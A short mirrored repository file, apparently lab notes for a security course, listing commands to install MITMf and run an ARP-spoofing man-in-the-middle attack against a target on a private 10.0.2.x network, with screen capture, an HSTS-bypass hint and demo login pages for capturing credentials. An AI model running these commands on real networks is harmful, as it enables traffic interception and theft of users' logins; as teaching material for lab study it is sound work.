mirror of
https://github.com/frankwxu/Ubalt.git
synced 2026-04-10 12:33:42 +00:00
14 lines
325 B
Plaintext
14 lines
325 B
Plaintext
arp -a //router's ip
|
|
|
|
//install mitmf
|
|
apt-get update
|
|
apt-get install mitmf -y
|
|
|
|
//attack
|
|
mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0
|
|
mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0 --screen
|
|
//-hsts
|
|
|
|
//Website
|
|
http://www.stealmylogin.com/demo.html
|
|
http://w3schools.invisionzone.com/ |